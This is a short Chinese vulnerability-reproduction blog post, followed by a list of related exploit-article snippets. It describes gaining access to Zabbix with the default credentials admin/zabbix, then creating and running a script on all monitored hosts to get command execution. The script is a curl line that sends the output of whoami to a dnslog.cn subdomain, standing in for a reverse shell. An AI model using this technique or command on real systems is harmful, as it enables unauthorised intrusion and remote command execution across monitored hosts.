【漏洞复现】Zabbix弱口令再到命令执行Getshell
一、信息收集
1、获取目标平台及url
2、通过外围打点,弱口令大法好,使用默认口令(admin/zabbix)成功进入
3、写入shell脚本
在管理-脚本-创建脚本写入反弹shell命令(本次用dnslog替代实验):
http://x.x.x.x/zabbix/zabbix.php?action=script.edit&scriptid=4
curl 'whoami'.whoami.q7yzw2.dnslog.cn |
4、执行shell脚本
4-1:(监控-最新数据)http://x.x.x.x/zabbix/latest.php?ddreset=1,
4-2:点击Host groups的select,全选,本地监听端口然后选择脚本执行
【漏洞复现】Zabbix弱口令再到命令执行Getshell相关推荐
- 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...
- 漏洞复现-Wordpress 4.6 PwnScriptum RCE命令执行
Wordpress 4.6 PwnScriptum RCE命令执行 目标介绍 漏洞来源 影响版本 CVE-2016-10033 Vulhub靶场搭建 复现过程 利用条件&问题注意点 解决办法 ...
- 漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data ...
- 漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求 ...
- [ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
- 复现XXL-JOB 任务调度中心后台任意命令执行漏洞
警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.漏洞描述 二.影响版本 三.漏洞复现 一.漏洞描述 XXL-JOB 任务调度中心攻击
- 【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)
0x01 Microsoft Office Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装.常用组件有 Word.Excel.PowerPoint等. 0x0 ...
- 速看!又一个 Redis 高危漏洞,可植入隐秘后门允许命令执行
公众号关注 「奇妙的 Linux 世界」 设为「星标」,每天带你玩转 Linux ! 被研究人员称之为Redigo的一种基于Go的新的恶意软件,它一直针对有CVE-2022-0543漏洞的Redis服 ...
- 6-21漏洞利用-mysql弱口令破解
mysql介绍 Mysql是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于Oracle旗下产品.Mysql 是最流行的关系型数据库管理系统之一,在WEB应用方面,mysql是最好 ...
最新文章
- [J2ME] Signing a midlet suite的讨论稿[Update]
- MySQL查询结果导出到文件
- [转载] python画柱状图-Python绘制精美图表之双柱形图
- linux下查看mysql配置文件位置
- [Python] jieba库?结巴库?
- cactiEZ 配置
- 转为html5播放器插件,15个HTML5播放器插件
- H3C ipsec psk aggressive mode配置
- python代码编程教学无限循环_代码陷入无限循环
- UNITY设计一款简单的3d射击小游戏(虚拟现实大作业)
- openssh-7.5p1升级
- Teradata:数据可视化与模型优化相辅相成
- 精华QT安装:qt-opensource-windows-x86-5.14.1
- 【LSSVM数据预测】基于matlab灰狼算法优化LSSVM数据预测【含Matlab源码 433期】
- 如何判断Linux 内核是稳定版本还是测试版本
- python 自动点赞_python实现在有漏洞的网站实现自动注册、登录、点赞
- Python习题十一
- 【Reference reading】基于PET和MRI的治疗计划系统:在BNCT和GdNCT中对剂量和通量分布的一种现实评估方法
- Idea中设置护眼绿
- deepin系统安装后检测不到声卡,无声音